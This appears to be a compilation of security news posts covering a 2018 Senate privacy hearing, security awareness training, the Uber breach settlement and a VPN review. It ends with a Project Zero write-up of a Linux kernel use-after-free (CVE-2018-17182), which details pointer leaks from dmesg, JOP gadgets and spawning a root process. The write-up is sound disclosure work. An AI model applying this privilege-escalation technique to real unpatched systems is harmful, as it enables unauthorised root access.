On September 26, 2018, the U.S. Senate Committee on Commerce, Science, and Transportation convened a hearing on Examining Consumer Privacy Protections with representatives of major technology and communications firms to discuss approaches to protecting consumer privacy, how the U.S. might craft a federal privacy law, and companies’ experiences in implementing the EU General Data Protection Regulation (“GDPR”) and the California Consumer Privacy Act (“CCPA”).

After introductory remarks by Senator and Chairman of the Committee John Thune (R-SD) and Senator Bill Nelson (D-FL), representatives from AT&T, Amazon, Google, Twitter, Apple and Charter Communications provided testimony on the importance of protecting consumer privacy, the need for clear rules that still ensure the benefits that flow from the responsible use of data, and key principles that should be included in any federal privacy law. A question and answer session followed, with various senators posing a variety of questions to the witnesses, covering topics such as comparisons to global data privacy regimes, the current and potential future authority of the Federal Trade Commission, online behavioral advertising and political advertising, current privacy tools and issues surrounding children’s data.

Key views expressed by the witnesses from the hearing include:

  • support for the creation of a federal privacy law and a preference for preemption rather than a patchwork of different state privacy laws;
  • agreement that the FTC should be the regulator for a federal privacy law but the authority of the FTC under such a law should be discussed and examined further;
  • concern around a federal privacy law attempting to copy the GDPR or CCPA. A federal privacy law should seek to avoid the difficulties and unintended consequences created by these laws and the U.S. should put its own stamp on what the law should be; and
  • agreement that a federal law should not be unduly burdensome for small and medium sized enterprises.

An archived webcast of the hearing is available on the Senate Commerce Committee’s website.

The hearing marked the first of several as the U.S. debates whether to adopt federal privacy legislation. The next hearing is scheduled for early October where Andrea Jelinek, head of the European Data Protection Board, Alastair MacTaggert, California privacy activist, and representatives from consumer organizations will participate and answer questions on consumer privacy, the GDPR and the CCPA.

Making an Impact with Security Awareness Training: Quick Wins and Sustained Impact

Posted under: Research and Analysis

Our last post explained Continuous Contextual Content as a means to optimize the effectiveness of a security awareness program. CCC acknowledges that users won’t get it, at least not initially. That means you need to reiterate your lessons over and over (and probably over) again. But when should you do that? Optimally when their receptivity is high – when they just made a mistake.

So you determine the relative risk of users, and watch for specific actions or alerts. When you see such behavior, deliver the training within the context of what they see then. But that’s not enough. You want to track the effectiveness of your training (and your security program) to get a sense of what works and what doesn’t. If you can’t close the loop on effectiveness, you have no idea whether your efforts are working, or how to continue improving your program.

To solidify the concepts, let’s go through a scenario which works through the process step by step. Let’s say you work for a large enterprise in the financial industry. Senior management increasingly worries about ransomware and data leakage. A recent penetration test showed that your general security controls are effective, but in their phishing simulation, over half your employees clicked a fairly obvious phish. And it’s a good thing your CIO has a good sense of humor, because the pen tester gained full access to his machine via a well-crafted drive-by attack which would have worked against the entire senior team.

So your mission, should you choose to accept it, is to implement security awareness training for the company. Let’s go!

Start with Urgency

As mentioned, your company has a well-established security program. So you can hit the ground running, using your existing baseline security data. Next identify the most significant risks and triage immediate action to start addressing them. Acting with urgency serves two purposes. It can give you a quick win, and we all know how important it is to show value immediately. As a secondary benefit you can start to work on training employees on a critical issue right away.

Your pen test showed that phishing poses the worst problems for your organization, so that’s where you should focus initial efforts. Given the high-level support for the program, you cajole your CEO into recording a video discussing the results of the phishing test and the importance of fixing the issue. A message like this helps everyone understand the urgency of addressing the problem and that the CEO will be watching.

Following that, every employee completes a series of five 3-5 minute training videos walking them through the basics of email security, with a required test at the end. Of course it’s hard to get 100% participation in anything, so you’ve already established consequences for those who choose not to complete the requirement. And the security team is available to help people who have a hard time passing.

It’s a balance between heavy-handedness and the importance of training users to defend themselves. You need to ensure employees know about the ongoing testing program, and that they’ll be tested periodically. That’s the continuous part of the approach – it’s not a one-time thing.

Introduce Contextual Training

As you execute on your initial phishing training effort, you also start to integrate your security awareness training platform with existing email, web, and DNS security services. This integration involves receiving an alert when an employee clicks a phishing message, automatically signing them up for training, and delivering a short (2-3 minute) refresher on email security. Of course contextual training requires flexibility, because an employee might be in the middle of a critical task. But you can establish an expectation that a vulnerable employee needs to complete training that day.

Similarly, if an employee navigates to a known malicious site, the web security service sends a trigger, and the web security refresher runs for that employee. The key is to make sure the interruption is both contextual and quick. The employee did this, so they need training immediately. Even a short delay will reduce the training’s effectiveness.

Additionally, you’ll be running ongoing training and simulations with employees. You’ll perform some analysis to pinpoint the employees who can’t seem to stop clicking things. These employees can get more intensive training, and escalation if they continue to violate corporate policies and put data at risk.

Overhaul Onboarding

After initial triage and integration with your security controls, you’ll work with HR to overhaul the training delivered during their onboarding process. You are now training employees continuously, so you don’t need to spend 3 hours teaching them about phishing and the hazards of clicking links.

Then onboarding can shift, to focus on establishing a culture of security from Day 1. This entails educating new employees on online and technology policies, and acceptable use expectations. You also have an opportunity to set expectations for security awareness training. Make clear that employees will be tested on an ongoing basis, and inform them who sees the results (their managers, etc.), along with the consequences of violating acceptable use policies.

Again, a fine line exists between being draconian and setting clear expectations. If the consequences have teeth (as they should), employees must know, and sign off on their understanding. We also recommend you test each new employee within a month of their start date to ensure they comprehend security expectations and retained their initial lessons.

Start a Competition

Once your program settles in over six months or so, it’s time to shake things up again. You can set up a competition, inviting the company to compete for the Chairperson’s Security Prize. Yes, you need to get the Chairperson on board for this, but that’s usually pretty easy because it helps the company. The prize needs to be impactful, and more than bragging rights. Maybe you can offer the winning department an extra day of holiday for the year. And a huge trophy. Teams love to compete for trophies they can display prominently in their area.

You’ll set the ground rules, including an internal red team and hunting team attacking each group. You’ll be tracking how many employees fall for the attacks and how many report the issues. Your teams can try physically breaching the facilities as well. You want the attacks to dovetail with ongoing security training and testing initiatives to reinforce security culture.

Run Another Simulation

You’ll also want to stage a widespread simulation a few months after the initial foray. Yes, you’ll be continuously testing employees as part of your continuous program. But getting a sense of company-wide results is also helpful. You should compare results from the initial test against the new results. Are fewer employees falling for the ruse? Are more reporting spammy and phishing emails to the central group? Ensuring the trend lines are moving in the right direction boosts the program and helps justify ongoing investment. You feed the results into the team scoring of the competition.

Lather, Rinse, Repeat

At some point, when another high-profile issue presents itself, you should take a similar approach. Let’s say your organization does a lot of business in Europe, so GDPR presents significant risk. You’ll want to train employees on how you define customer data and how to handle it.

Next determine whether you need special training for this issue, or whether you can integrate it into your more extensive semi-annual training for all employees. Every six months all employees sit for perhaps an hour, watching an update on both new hacker tactics and changes to corporate security policies.

Once that round of training completes, you will roll out new tests to highlight how customer data could be lost or stolen. Factor the new tests into your next competition as well, to keep focus on the changing nature of security and the ongoing contest.

Sustaining Impact

Once your program is humming along, we suggest you pick a new high priority topic every six months to make that the focus of your semi-annual scheduled training. As part of addressing this new topic, you’ll integrate with the relevant controls to enable ongoing contextual training and perform an initial test (to establish a baseline), and then track improvement over time.

You’ll also want a more comprehensive set of reports to track the effectiveness of your awareness training; deliver this information to senior management, and perhaps the audit committee. Maybe each quarter you’ll report on how much contextual training employees received, and how often they repeated mistakes after training. You’ll also want to report on the overall number of successful attacks, alongside trends of which attacks worked and which were blocked. Being able to map those results back to training topics makes an excellent case for ongoing investment.

At some point the competition will end and you’ll crown the winner. We suggest making a big deal of the winning team. Maybe you can record the award ceremony with the chairperson and memorialize their victory in the company newsletter. You want to make sure all employees understand security is essential and visible at the highest echelons of your organization.

It’s a journey, not a destination, so ensure consistency in your program. Add new focus topics to extend your employee knowledge, keep your content current and interesting, and hold your employees to a high standard – make sure they understand expectations and the consequences of violating corporate policies. Building a security culture requires patience, persistence, and accountability. Anchoring your security awareness training program with continuous, contextual content will go a long way to establishing such a security culture.

With that we wrap up this series on Making an Impact with Security Awareness Training. Thanks again to Mimecast for licensing this content, and we’ll have the assembled and edited paper available in our Research Library within a couple weeks.

- Mike Rothman

Do You Suffer From Breach Optimism Bias?

If you’ve been in the information security field for at least a year, you’ve undoubtedly heard your organization defend the lack of investment in, change to, or optimization of a cybersecurity policy, mitigating control, or organizational belief. This “It hasn’t happened to us, so it likely won’t happen” mentality is called optimism bias, and it’s an issue in our field that predates the field itself.

Read my full article over at

Uber Settles with 50 State Attorneys General for $148 Million In Connection with 2016 Data Breach

On September 26, 2018, Uber Technologies Inc. (“Uber”) agreed to a settlement (the “Settlement”) with all 50 U.S. state attorneys general (the “Attorneys General”) in connection with a 2016 data breach affecting the personal information (including driver’s license numbers) of approximately 607,000 Uber drivers nationwide, as well as approximately 57 million consumers’ email addresses and phone numbers. The Attorneys General alleged that after Uber learned of the breach, which occurred in November 2016, the company paid intruders a $100,000 ransom to delete the data. The Attorneys General alleged that Uber failed to promptly notify affected individuals of the incident, as required under various state laws, instead notifying affected customers and drivers of the breach one year later in November 2017. 

As reported by the Pennsylvania Office of the Attorney General, the Settlement will require Uber to pay $148 million to the Attorneys General, which will be divided among the 50 states. In addition, Uber must undertake certain data security measures, including:

  • comply with applicable breach notification and consumer protection laws regarding protecting personal information;
  • implement measures to protect user data stored on third-party platforms;
  • implement stricter internal password policies for employee access to Uber’s network;
  • develop and implement an overall data security policy to address the collection and protection of personal information, including assessing potential data security risks;
  • implement additional data security measures with respect to personal information stored on Uber’s network;
  • implement a corporate integrity program to ensure appropriate reporting channels for internal ethics concerns or complaints; and
  • engage a third-party expert to conduct regular assessments of Uber’s data security efforts and make recommendations for improvement, as appropriate.

The Settlement is pending court approval. In a statement, California Attorney General Xavier Becerra said, “Uber’s decision to cover up this breach was a blatant violation of the public’s trust. The company failed to safeguard user data and notify authorities when it was exposed. Consistent with its corporate culture at the time, Uber swept the breach under the rug in deliberate disregard of the law.”

We previously reported that the Federal Trade Commission modified a 2017 settlement with Uber after learning of the company’s response to the 2016 breach.

Update: In addition, as reported by Law360, on November 27, 2018, Uber was fined by both the UK Information Commissioner’s Office (“ICO”) and the Dutch Data Protection Authority (“DPA”). The ICO’s fine of £385,000 was a result of Uber’s failure to protect its customers’ personal information. The Dutch DPA fined Uber €600,000 “for violating the Dutch data breach regulation,” which requires notification of the breach within 72 hours.

F-Secure Freedome review: A VPN with some built-in antivirus features

F-Secure Freedome in brief:

  • P2P allowed: No
  • Business location: Finland
  • Number of servers:  N/A
  • Number of country locations: 22
  • Cost: $50-$80 per year
  • VPN protocol: OpenVPN
  • Data encryption: AES 128-bit
  • Data authentication: AES 128-bit
  • Handshake encryption: 2048-bit RSA keys with SHA-256 certificates

There are a few VPN services that offer their own antivirus: one is Avira Phantom VPN Pro, which we looked at previously; Finland-based F-Secure is another. The company’s Freedome VPN is a premium service that offers 22 country locations around the world and extra freebies like tracker and malicious-site blocking.


Extreme Ownership – Enterprise Security Weekly #108

This week, Paul and Matt Alderman talk about Threat and Vulnerability management, and how Cloud and Application security's impact on vendors can help with integration in the Enterprise! In the Enterprise News this week, Bomgar to be renamed BeyondTrust after acquisition, Attivo brings cyber security deception to containers and serverless, Symantec extends data loss prevention platform with DRM, ExtraHop announces the availability of Reveal(x) for Azure, and Cloud Native applications are at risk from Zero Touch attacks! All that and more on this episode of Enterprise Security Weekly!




Visit https://www.activecountermeasures/esw to sign up for a demo or buy our AI Hunter!



Cybercriminals Increasingly Trying to Ensnare the Big Financial Fish

Threat groups such as GOLD KINGSWOOD are using their extensive resources and network insights to target high-value financial organizations around the world.


CTU Research


A cache invalidation bug in Linux memory management

Posted by Jann Horn, Google Project Zero

This blogpost describes a way to exploit a Linux kernel bug (CVE-2018-17182) that has existed since kernel version 3.16. While the bug itself is in code that is reachable even from relatively strongly sandboxed contexts, this blogpost only describes a way to exploit it in environments that use Linux kernels that haven't been configured for increased security (specifically, Ubuntu 18.04 with kernel linux-image-4.15.0-34-generic at version 4.15.0-34.37). This demonstrates how the kernel configuration can have a big impact on the difficulty of exploiting a kernel bug.

The bug report and the exploit are filed in our issue tracker as issue 1664.

Fixes for the issue are in the upstream stable releases 4.18.9, 4.14.71, 4.9.128, 4.4.157 and 3.16.58.

The bug

Whenever a userspace page fault occurs because e.g. a page has to be paged in on demand, the Linux kernel has to look up the VMA (virtual memory area; struct vm_area_struct) that contains the fault address to figure out how the fault should be handled. The slowpath for looking up a VMA (in find_vma()) has to walk a red-black tree of VMAs. To avoid this performance hit, Linux also has a fastpath that can bypass the tree walk if the VMA was recently used.

The implementation of the fastpath has changed over time; since version 3.15, Linux uses per-thread VMA caches with four slots, implemented in mm/vmacache.c and include/linux/vmacache.h. Whenever a successful lookup has been performed through the slowpath, vmacache_update() stores a pointer to the VMA in an entry of the array current->vmacache.vmas, allowing the next lookup to use the fastpath.

Note that VMA caches are per-thread, but VMAs are associated with a whole process (more precisely with a struct mm_struct; from now on, this distinction will largely be ignored, since it isn't relevant to this bug). Therefore, when a VMA is freed, the VMA caches of all threads must be invalidated - otherwise, the next VMA lookup would follow a dangling pointer. However, since a process can have many threads, simply iterating through the VMA caches of all threads would be a performance problem.

To solve this, both the struct mm_struct and the per-thread struct vmacache are tagged with sequence numbers; when the VMA lookup fastpath discovers in vmacache_valid() that current->vmacache.seqnum and current->mm->vmacache_seqnum don't match, it wipes the contents of the current thread's VMA cache and updates its sequence number.

The sequence numbers of the mm_struct and the VMA cache were only 32 bits wide, meaning that it was possible for them to overflow. To ensure that a VMA cache can't incorrectly appear to be valid when current->mm->vmacache_seqnum has actually been incremented 2^32 times, vmacache_invalidate() (the helper that increments current->mm->vmacache_seqnum) had a special case: When current->mm->vmacache_seqnum wrapped to zero, it would call vmacache_flush_all() to wipe the contents of all VMA caches associated with current->mm. Executing vmacache_flush_all() was very expensive: It would iterate over every thread on the entire machine, check which struct mm_struct it is associated with, then if necessary flush the thread's VMA cache.

In version 3.16, an optimization was added: If the struct mm_struct was only associated with a single thread, vmacache_flush_all() would do nothing, based on the realization that every VMA cache invalidation is preceded by a VMA lookup; therefore, in a single-threaded process, the VMA cache's sequence number is always close to the mm_struct's sequence number:

/* Single threaded tasks need not iterate the entire
 * list of process. We can avoid the flushing as well
 * since the mm's seqnum was increased and don't have
 * to worry about other threads' seqnum. Current's
 * flush will occur upon the next lookup.
 */
if (atomic_read(&mm->mm_users) == 1)
        return;

However, this optimization is incorrect because it doesn't take into account what happens if a previously single-threaded process creates a new thread immediately after the mm_struct's sequence number has wrapped around to zero. In this case, the sequence number of the first thread's VMA cache will still be 0xffffffff, and the second thread can drive the mm_struct's sequence number up to 0xffffffff again. At that point, the first thread's VMA cache, which can contain dangling pointers, will be considered valid again, permitting the use of freed VMA pointers in the first thread's VMA cache.

The bug was fixed by changing the sequence numbers to 64 bits, thereby making an overflow infeasible, and removing the overflow handling logic.

Reachability and Impact

Fundamentally, this bug can be triggered by any process that can run for a sufficiently long time to overflow the sequence number (about an hour if MAP_FIXED is usable) and has the ability to use mmap()/munmap() (to manage memory mappings) and clone() (to create a thread). These syscalls do not require any privileges, and they are often permitted even in seccomp-sandboxed contexts, such as the Chrome renderer sandbox (mmap, munmap, clone), the sandbox of the main gVisor host component, and Docker's seccomp policy.

To make things easy, my exploit uses various other kernel interfaces, and therefore doesn't just work from inside such sandboxes; in particular, it uses /dev/kmsg to read dmesg logs and uses an eBPF array to spam the kernel's page allocator with user-controlled, mutable single-page allocations. However, an attacker willing to invest more time into an exploit would probably be able to avoid using such interfaces.

Interestingly, it looks like Docker in its default config doesn't prevent containers from accessing the host's dmesg logs if the kernel permits dmesg access for normal users - while /dev/kmsg doesn't exist in the container, the seccomp policy whitelists the syslog() syscall for some reason.

BUG_ON(), WARN_ON_ONCE(), and dmesg

The function in which the first use-after-free access occurs is vmacache_find(). When this function was first added - before the bug was introduced -, it accessed the VMA cache as follows:

      for (i = 0; i < VMACACHE_SIZE; i++) {
              struct vm_area_struct *vma = current->vmacache[i];

              if (vma && vma->vm_start <= addr && vma->vm_end > addr) {
                      BUG_ON(vma->vm_mm != mm);
                      return vma;
              }
      }
When this code encountered a cached VMA whose bounds contain the supplied address addr, it checked whether the VMA's ->vm_mm pointer matched the expected mm_struct - which should always be the case, unless a memory safety problem has happened -, and if not, terminated with a BUG_ON() assertion failure. BUG_ON() is intended to handle cases in which a kernel thread detects a severe problem that can't be cleanly handled by bailing out of the current context. In a default upstream kernel configuration, BUG_ON() will normally print a backtrace with register dumps to the dmesg log buffer, then forcibly terminate the current thread. This can sometimes prevent the rest of the system from continuing to work properly - for example, if the crashing code held an important lock, any other thread that attempts to take that lock will then deadlock -, but it is often successful in keeping the rest of the system in a reasonably usable state. Only when the kernel detects that the crash is in a critical context, such as an interrupt handler, does it bring down the whole system with a kernel panic.

The same handler code is used for dealing with unexpected crashes in kernel code, like page faults and general protection faults at non-whitelisted addresses: By default, if possible, the kernel will attempt to terminate only the offending thread.

The handling of kernel crashes is a tradeoff between availability, reliability and security. A system owner might want a system to keep running as long as possible, even if parts of the system are crashing, if a sudden kernel panic would cause data loss or downtime of an important service. Similarly, a system owner might want to debug a kernel bug on a live system, without an external debugger; if the whole system terminated as soon as the bug is triggered, it might be harder to debug an issue properly.
On the other hand, an attacker attempting to exploit a kernel bug might benefit from the ability to retry an attack multiple times without triggering system reboots; and an attacker with the ability to read the crash log produced by the first attempt might even be able to use that information for a more sophisticated second attempt.

The kernel provides two sysctls that can be used to adjust this behavior, depending on the desired tradeoff:

  • kernel.panic_on_oops will automatically cause a kernel panic when a BUG_ON() assertion triggers or the kernel crashes; its initial value can be configured using the build configuration variable CONFIG_PANIC_ON_OOPS. It is off by default in the upstream kernel - and enabling it by default in distributions would probably be a bad idea -, but it is e.g. enabled by Android.
  • kernel.dmesg_restrict controls whether non-root users can access dmesg logs, which, among other things, contain register dumps and stack traces for kernel crashes; its initial value can be configured using the build configuration variable CONFIG_SECURITY_DMESG_RESTRICT. It is off by default in the upstream kernel, but is enabled by some distributions, e.g. Debian. (Android relies on SELinux to block access to dmesg.)

Ubuntu, for example, enables neither of these.

The code snippet from above was amended in the same month as it was committed:

      for (i = 0; i < VMACACHE_SIZE; i++) {
               struct vm_area_struct *vma = current->vmacache[i];
-               if (vma && vma->vm_start <= addr && vma->vm_end > addr) {
-                       BUG_ON(vma->vm_mm != mm);
+               if (!vma)
+                       continue;
+               if (WARN_ON_ONCE(vma->vm_mm != mm))
+                       break;
+               if (vma->vm_start <= addr && vma->vm_end > addr)
                       return vma;
-               }

This amended code is what distributions like Ubuntu are currently shipping.

The first change here is that the sanity check for a dangling pointer happens before the address comparison. The second change is somewhat more interesting: BUG_ON() is replaced with WARN_ON_ONCE().

WARN_ON_ONCE() prints debug information to dmesg that is similar to what BUG_ON() would print. The differences from BUG_ON() are that WARN_ON_ONCE() only prints debug information the first time it triggers, and that execution continues: Now when the kernel detects a dangling pointer in the VMA cache lookup fastpath - in other words, when it heuristically detects that a use-after-free has happened -, it just bails out of the fastpath and falls back to the red-black tree walk. The process continues normally.

This fits in with the kernel's policy of attempting to keep the system running as much as possible by default; if an accidental use-after-free bug occurs here for some reason, the kernel can probably heuristically mitigate its effects and keep the process working.

The policy of only printing a warning even when the kernel has discovered a memory corruption is problematic for systems that should kernel panic when the kernel notices security-relevant events like kernel memory corruption. Simply making WARN() trigger kernel panics isn't really an option because WARN() is also used for various events that are not important to the kernel's security. For this reason, a few uses of WARN_ON() in security-relevant places have been replaced with CHECK_DATA_CORRUPTION(), which permits toggling the behavior between BUG() and WARN() at kernel configuration time. However, CHECK_DATA_CORRUPTION() is only used in the linked list manipulation code and in addr_limit_user_check(); the check in the VMA cache, for example, still uses a classic WARN_ON_ONCE().

A third important change was made to this function; however, this change is relatively recent and will first be in the 4.19 kernel, which hasn't been released yet, so it is irrelevant for attacking currently deployed kernels.

      for (i = 0; i < VMACACHE_SIZE; i++) {
-               struct vm_area_struct *vma = current->vmacache.vmas[i];
+               struct vm_area_struct *vma = current->vmacache.vmas[idx];
-               if (!vma)
-                       continue;
-               if (WARN_ON_ONCE(vma->vm_mm != mm))
-                       break;
-               if (vma->vm_start <= addr && vma->vm_end > addr) {
-                       count_vm_vmacache_event(VMACACHE_FIND_HITS);
-                       return vma;
+               if (vma) {
+#ifdef CONFIG_DEBUG_VM_VMACACHE
+                       if (WARN_ON_ONCE(vma->vm_mm != mm))
+                               break;
+#endif
+                       if (vma->vm_start <= addr && vma->vm_end > addr) {
+                               count_vm_vmacache_event(VMACACHE_FIND_HITS);
+                               return vma;
+                       }
+               }
+               if (++idx == VMACACHE_SIZE)
+                       idx = 0;

After this change, the sanity check is skipped altogether unless the kernel is built with the debugging option CONFIG_DEBUG_VM_VMACACHE.

The exploit: Incrementing the sequence number

The exploit has to increment the sequence number roughly 2^33 times. Therefore, the efficiency of the primitive used to increment the sequence number is important for the runtime of the whole exploit.

It is possible to cause two sequence number increments per syscall as follows: Create an anonymous VMA that spans three pages. Then repeatedly use mmap() with MAP_FIXED to replace the middle page with an equivalent VMA. This causes mmap() to first split the VMA into three VMAs, then replace the middle VMA, and then merge the three VMAs together again, causing VMA cache invalidations for the two VMAs that are deleted while merging the VMAs.

The exploit: Replacing the VMA

Enumerating all potential ways to attack the use-after-free without releasing the slab's backing page (according to /proc/slabinfo, the Ubuntu kernel uses one page per vm_area_struct slab) back to the buddy allocator / page allocator:

  1. Get the vm_area_struct reused in the same process. The process would then be able to use this VMA, but this doesn't result in anything interesting, since the VMA caches of the process would be allowed to contain pointers to the VMA anyway.
  2. Free the vm_area_struct such that it is on the slab allocator's freelist, then attempt to access it. However, at least the SLUB allocator that Ubuntu uses replaces the first 8 bytes of the vm_area_struct (which contain vm_start, the userspace start address) with a kernel address. This makes it impossible for the VMA cache lookup function to return it, since the condition vma->vm_start <= addr && vma->vm_end > addr can't be fulfilled, and therefore nothing interesting happens.
  3. Free the vm_area_struct such that it is on the slab allocator's freelist, then allocate it in another process. This would (with the exception of a very narrow race condition that can't easily be triggered repeatedly) result in hitting the WARN_ON_ONCE(), and therefore the VMA cache lookup function wouldn't return the VMA.
  4. Free the vm_area_struct such that it is on the slab allocator's freelist, then make an allocation from a slab that has been merged with the vm_area_struct slab. This requires the existence of an aliasing slab; in a Ubuntu 18.04 VM, no such slab seems to exist.

Therefore, to exploit this bug, it is necessary to release the backing page back to the page allocator, then reallocate the page in some way that permits placing controlled data in it. There are various kernel interfaces that could be used for this; for example:

pipe pages:
  • advantage: not wiped on allocation
  • advantage: permits writing at an arbitrary in-page offset if splice() is available
  • advantage: page-aligned
  • disadvantage: can't do multiple writes without first freeing the page, then reallocating it

BPF maps:
  • advantage: can repeatedly read and write contents from userspace
  • advantage: page-aligned
  • disadvantage: wiped on allocation

This exploit uses BPF maps.

The exploit: Leaking pointers from dmesg

The exploit wants to have the following information:

  • address of the mm_struct
  • address of the use-after-free'd VMA
  • load address of kernel code

At least in the Ubuntu 18.04 kernel, the first two of these are directly visible in the register dump triggered by WARN_ON_ONCE(), and can therefore easily be extracted from dmesg: The mm_struct's address is in RDI, and the VMA's address is in RAX. However, an instruction pointer is not directly visible because RIP and the stack are symbolized, and none of the general-purpose registers contain an instruction pointer.

A kernel backtrace can contain multiple sets of registers: When the stack backtracing logic encounters an interrupt frame, it generates another register dump. Since we can trigger the WARN_ON_ONCE() through a page fault on a userspace address, and page faults on userspace addresses can happen at any userspace memory access in syscall context (via copy_from_user()/copy_to_user()/...), we can pick a call site that has the relevant information in a register from a wide range of choices. It turns out that writing to an eventfd triggers a usercopy while R8 still contains the pointer to the eventfd_fops structure.

When the exploit runs, it replaces the VMA with zeroed memory, then triggers a VMA lookup against the broken VMA cache, intentionally triggering the WARN_ON_ONCE(). This generates a warning that looks as follows - the leaks used by the exploit are highlighted:

[ 3482.271265] WARNING: CPU: 0 PID: 1871 at /build/linux-SlLHxe/linux-4.15.0/mm/vmacache.c:102 vmacache_find+0x9c/0xb0
[ 3482.271298] RIP: 0010:vmacache_find+0x9c/0xb0
[ 3482.271299] RSP: 0018:ffff9e0bc2263c60 EFLAGS: 00010203
[ 3482.271300] RAX: ffff8c7caf1d61a0 RBX: 00007fffffffd000 RCX: 0000000000000002
[ 3482.271301] RDX: 0000000000000002 RSI: 00007fffffffd000 RDI: ffff8c7c214c7380
[ 3482.271301] RBP: ffff9e0bc2263c60 R08: 0000000000000000 R09: 0000000000000000
[ 3482.271302] R10: 0000000000000000 R11: 0000000000000000 R12: ffff8c7c214c7380
[ 3482.271303] R13: ffff9e0bc2263d58 R14: ffff8c7c214c7380 R15: 0000000000000014
[ 3482.271304] FS:  00007f58c7bf6a80(0000) GS:ffff8c7cbfc00000(0000) knlGS:0000000000000000
[ 3482.271305] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 3482.271305] CR2: 00007fffffffd000 CR3: 00000000a143c004 CR4: 00000000003606f0
[ 3482.271308] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 3482.271309] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 3482.271309] Call Trace:
[ 3482.271314]  find_vma+0x1b/0x70
[ 3482.271318]  __do_page_fault+0x174/0x4d0
[ 3482.271320]  do_page_fault+0x2e/0xe0
[ 3482.271323]  do_async_page_fault+0x51/0x80
[ 3482.271326]  async_page_fault+0x25/0x50
[ 3482.271329] RIP: 0010:copy_user_generic_unrolled+0x86/0xc0
[ 3482.271330] RSP: 0018:ffff9e0bc2263e08 EFLAGS: 00050202
[ 3482.271330] RAX: 00007fffffffd008 RBX: 0000000000000008 RCX: 0000000000000001
[ 3482.271331] RDX: 0000000000000000 RSI: 00007fffffffd000 RDI: ffff9e0bc2263e30
[ 3482.271332] RBP: ffff9e0bc2263e20 R08: ffffffffa7243680 R09: 0000000000000002
[ 3482.271333] R10: ffff8c7bb4497738 R11: 0000000000000000 R12: ffff9e0bc2263e30
[ 3482.271333] R13: ffff8c7bb4497700 R14: ffff8c7cb7a72d80 R15: ffff8c7bb4497700
[ 3482.271337]  ? _copy_from_user+0x3e/0x60
[ 3482.271340]  eventfd_write+0x74/0x270
[ 3482.271343]  ? common_file_perm+0x58/0x160
[ 3482.271345]  ? wake_up_q+0x80/0x80
[ 3482.271347]  __vfs_write+0x1b/0x40
[ 3482.271348]  vfs_write+0xb1/0x1a0
[ 3482.271349]  SyS_write+0x55/0xc0
[ 3482.271353]  do_syscall_64+0x73/0x130
[ 3482.271355]  entry_SYSCALL_64_after_hwframe+0x3d/0xa2
[ 3482.271356] RIP: 0033:0x55a2e8ed76a6
[ 3482.271357] RSP: 002b:00007ffe71367ec8 EFLAGS: 00000202 ORIG_RAX: 0000000000000001
[ 3482.271358] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 000055a2e8ed76a6
[ 3482.271358] RDX: 0000000000000008 RSI: 00007fffffffd000 RDI: 0000000000000003
[ 3482.271359] RBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000
[ 3482.271359] R10: 0000000000000000 R11: 0000000000000202 R12: 00007ffe71367ec8
[ 3482.271360] R13: 00007fffffffd000 R14: 0000000000000009 R15: 0000000000000000
[ 3482.271361] Code: 00 48 8b 84 c8 10 08 00 00 48 85 c0 74 11 48 39 78 40 75 17 48 39 30 77 06 48 39 70 08 77 8d 83 c2 01 83 fa 04 75 ce 31 c0 5d c3 <0f> 0b 31 c0 5d c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f
[ 3482.271381] ---[ end trace bf256b6e27ee4552 ]---

At this point, the exploit can create a fake VMA that contains the correct mm_struct pointer (leaked from RDI). It also populates other fields with references to fake data structures (by creating pointers back into the fake VMA using the leaked VMA pointer from RAX) and with pointers into the kernel's code (using the leaked R8 from the page fault exception frame to bypass KASLR).

The exploit: JOP (the boring part)

It is probably possible to exploit this bug in some really elegant way by abusing the ability to overlay a fake writable VMA over existing readonly pages, or something like that; however, this exploit just uses classic jump-oriented programming.

To trigger the use-after-free a second time, a writing memory access is performed on an address that has no pagetable entries. At this point, the kernel's page fault handler comes in via page_fault -> do_page_fault -> __do_page_fault -> handle_mm_fault -> __handle_mm_fault -> handle_pte_fault -> do_fault -> do_shared_fault -> __do_fault, at which point it performs an indirect call:

static int __do_fault(struct vm_fault *vmf)
{
        struct vm_area_struct *vma = vmf->vma;
        int ret;

        ret = vma->vm_ops->fault(vmf);

vma is the VMA structure we control, so at this point, we can gain instruction pointer control. R13 contains a pointer to vma. The JOP chain that is used from there on follows; it is quite crude (for example, it crashes after having done its job), but it works.

First, to move the VMA pointer to RDI:

ffffffff810b5c21: 49 8b 45 70           mov rax,QWORD PTR [r13+0x70]
ffffffff810b5c25: 48 8b 80 88 00 00 00  mov rax,QWORD PTR [rax+0x88]
ffffffff810b5c2c: 48 85 c0              test rax,rax
ffffffff810b5c2f: 74 08                 je ffffffff810b5c39
ffffffff810b5c31: 4c 89 ef              mov rdi,r13
ffffffff810b5c34: e8 c7 d3 b4 00        call ffffffff81c03000 <__x86_indirect_thunk_rax>

Then, to get full control over RDI:

ffffffff810a4aaa: 48 89 fb              mov rbx,rdi
ffffffff810a4aad: 48 8b 43 20           mov rax,QWORD PTR [rbx+0x20]
ffffffff810a4ab1: 48 8b 7f 28           mov rdi,QWORD PTR [rdi+0x28]
ffffffff810a4ab5: e8 46 e5 b5 00        call ffffffff81c03000 <__x86_indirect_thunk_rax>

At this point, we can call into run_cmd(), which spawns a root-privileged usermode helper, using a space-delimited path and argument list as its only argument. This gives us the ability to run a binary we have supplied with root privileges. (Thanks to Mark for pointing out that if you control RDI and RIP, you don't have to try to do crazy things like flipping the SM*P bits in CR4, you can just spawn a usermode helper...)

After launching the usermode helper, the kernel crashes with a page fault because the JOP chain doesn't cleanly terminate; however, since that only kills the process in whose context the fault occurred, it doesn't really matter.

Fix timeline

This bug was reported 2018-09-12. Two days later, 2018-09-14, a fix was in the upstream kernel tree. This is exceptionally fast, compared to the fix times of other software vendors. At this point, downstream vendors could theoretically backport and apply the patch. The bug is essentially public at this point, even if its security impact is obfuscated by the commit message - as grsecurity frequently demonstrates.

However, a fix being in the upstream kernel does not automatically mean that users' systems are actually patched. The normal process for shipping fixes to users who use distribution kernels based on upstream stable branches works roughly as follows:

  1. A patch lands in the upstream kernel.
  2. The patch is backported to an upstream-supported stable kernel.
  3. The distribution merges the changes from upstream-supported stable kernels into its kernels.
  4. Users install the new distribution kernel.

